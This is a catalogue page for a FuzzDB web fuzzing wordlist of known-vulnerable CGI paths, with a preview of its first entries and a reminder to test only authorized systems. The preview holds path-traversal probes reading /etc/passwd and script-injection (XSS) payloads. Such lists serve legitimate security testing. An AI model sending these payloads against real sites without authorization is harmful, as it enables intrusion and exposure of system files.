FuzzDB CGI Cross-Platform Paths
Large cross-platform list of CGI scripts and known-vulnerable CGI request paths for fuzzing inside cgi-bin and script directories. Includes legacy CGI exploits and traversal probes.
- Size
- 137 KB
- Category
- Web Content
- Source
- fuzzdb-project/fuzzdb
- License
- GPLv2
- Recommended tools
- ffufgobusterferoxbusterwfuzz
Preview
First 15 entries. Download or copy the full list (137 KB) using the buttons above.
# fuzz inside cgi directories - on windows, this is usually /scripts /bin /cgi or /cgi-bin, on unix, usually /cgi-bin /cgi or /nph-cgi
14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
14all.cgi?cfg=../../../../../../../../etc/passwd
666%0a%0a<script>alert('Vulnerable');</script>666.jsp
852566C90012664F
</etc/passwd>
<script>alert('Vulnerable')</script>
<script>alert('Vulnerable')</script>.aspx
<script>alert('Vulnerable')</script>.jsp
<script>alert('Vulnerable')</script>.shtm
<script>alert('Vulnerable')</script>.shtml
<script>alert('Vulnerable')</script>.stm
<script>alert('Vulnerable')</script>.thtml
?D=A
?M=ALarge cross-platform list of CGI scripts and known-vulnerable CGI request paths for fuzzing inside cgi-bin and script directories. Includes legacy CGI exploits and traversal probes.
This list is geared toward web content and directory discovery. It contains roughly 137 KB and pairs well with tools such as ffuf, gobuster, feroxbuster, wfuzz. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.
You can copy the sample preview straight from this page, copy the entire list to
your clipboard, or download the raw .txt file. The full list is served directly
from its upstream source on GitHub.
Sourced from fuzzdb-project/fuzzdb and distributed under GPLv2. Only use wordlists against systems you are explicitly authorized to test.